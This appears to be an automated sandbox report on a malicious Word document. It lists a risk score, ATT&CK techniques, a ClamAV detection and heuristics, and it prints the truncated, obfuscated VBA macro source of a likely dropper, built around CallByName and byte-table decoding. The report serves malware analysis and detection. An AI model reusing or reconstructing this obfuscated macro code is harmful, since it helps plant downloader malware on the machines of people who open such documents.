MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros, as indicated by multiple high-severity heuristics and ClamAV detection. The VBA code utilizes `GetObject` and `CallByName` functions, suggesting dynamic execution of code. While the exact payload is obfuscated, the presence of macros strongly implies a downloader or dropper functionality, likely intended to deliver a second-stage malicious payload. The `macros.bas` file is identified as the source of these macros.
Heuristics 5
-
ClamAV: Doc.Malware.Valyria-9761059-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-9761059-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 28848 bytes |
SHA-256: f2f750dd4ba27aa69a61c1a79afd0fe4033550eb29befb4f58018a7d40cc4a48 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "sub1, 0, 0, MSForms, Frame" Dim dim99, dim59(2) As Byte, dim43(9) As Byte, dim74(32) As Byte, dim62(19) As Byte, dim81(13) As Byte, dim5(5) As Byte, dim04(55) As Byte, dim18(807) As Byte, dim98(5) As Byte, dim86(19) As Byte, dim69(19) As Byte, dim64(1 To 255) As Byte Private Function dim10(dim00) On Error GoTo dim75 Dim dim73, dim91 Do dim91 = dim00(dim73) dim73 = dim73 + 1 Loop dim75: dim10 = dim73 - 1 End Function Private Function dim07(dim53() As Byte, dim79) Dim dim85, dim68 On Error GoTo dim72 While dim85 <= dim79 dim68 = dim53(dim85) If dim68 = 0 Then Exit Function End If dim07 = dim07 & dim71(dim68) dim68 = 0 dim85 = dim85 + 1 Wend dim72: End Function Private Function dim12(dim8, dim31, dim84, dim65, dim57, dim09) On Error GoTo dim9 Set dim12 = CallByName(dim8, dim31, dim84, dim57) dim9: End Function Private Sub dim93() dim18(669) = dim64(226) dim18(58) = dim64(123) dim18(629) = dim64(74) dim18(350) = dim64(95) dim18(106) = dim64(133) dim18(631) = dim64(75) dim18(150) = dim64(121) dim18(301) = dim64(199) dim18(185) = dim64(33) dim18(192) = dim64(162) dim18(658) = dim64(70) dim18(769) = dim64(109) dim18(86) = dim64(59) dim18(343) = dim64(54) dim18(677) = dim64(170) dim18(91) = dim64(189) dim18(136) = dim64(4) dim18(386) = dim64(124) dim18(205) = dim64(253) dim18(639) = dim64(203) dim18(241) = dim64(163) dim18(484) = dim64(81) dim18(761) = dim64(76) dim18(506) = dim64(69) dim18(308) = dim64(189) dim18(745) = dim64(243) dim18(480) = dim64(120) dim18(550) = dim64(237) dim18(777) = dim64(105) dim18(507) = dim64(124) dim18(604) = dim64(219) dim18(751) = dim64(213) dim18(644) = dim64(235) dim18(79) = dim64(216) dim18(363) = dim64(169) dim18(533) = dim64(188) dim18(97) = dim64(238) dim18(732) = dim64(80) dim18(534) = dim64(255) dim18(693) = dim64(128) dim18(359) = dim64(24) dim18(23) = dim64(211) dim18(462) = dim64(189) dim18(61) = dim64(164) dim18(730) = dim64(54) dim18(746) = dim64(196) dim18(103) = dim64(82) dim18(680) = dim64(159) dim18(504) = dim64(1) dim18(581) = dim64(95) dim18(221) = dim64(225) dim18(666) = dim64(224) dim18(181) = dim64(105) dim18(133) = dim64(224) dim18(420) = dim64(249) dim18(570) = dim64(104) dim18(40) = dim64(252) dim18(499) = dim64(27) dim18(193) = dim64(204) dim18(370) = dim64(17) dim18(224) = dim64(7) dim18(203) = dim64(224) dim18(202) = dim64(124) dim18(605) = dim64(128) dim18(487) = dim64(30) dim18(653) = dim64(45) dim18(464) = dim64(134) dim18(358) = dim64(55) dim18(380) = dim64(197) dim18(508) = dim64(21) dim18(475) = dim64(16) dim18(696) = dim64(104) dim18(198) = dim64(221) dim18(161) = dim64(194) dim18(602) = dim64(172) dim18(393) = dim64(225) dim18(710) = dim64(214) dim18(590) = dim64(124) dim18(649) = dim64(167) dim18(371) = dim64(5) dim18(729) = dim64(36) dim18(452) = dim64(30) dim18(805) = dim64(111) dim18(449) = dim64(84) dim18(238) = dim64(52) dim18(547) = dim64(83) dim18(170) = dim64(190) dim18(681) = dim64(38) dim18(99) = dim64(113) dim18(672) = dim64(220) dim18(11) = dim64(24) dim18(85) = dim64(155) dim18(735) = dim64(136) dim18(149) = dim64(200) dim18(770) = dim64(14) dim18(351) = dim64(203) dim18(105) = dim64(145) dim18(460) = dim64(72) dim18(575) = dim64(114) dim18(134) = dim64(71) dim18(583) = dim64(47) dim18(611) = dim64(252) dim18(7) = dim64(62) dim18(539) = dim64(1) dim18(614) = dim64(76) dim18(736) = dim64(60) dim18(369) = dim64(45) dim18(73) = dim64(8) dim18(595) = dim64(158) dim18(718) = dim64(98) dim18(94) = dim64(122) dim18(179) = dim64(189) dim18(298) = dim64(133) dim18(527) = dim64(178) dim18(195) = dim64(103) dim18(721) = dim64(48) dim18(470) = dim64(151) dim18(448) = dim64(65) dim18(763) = dim64(96) dim18(768 ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.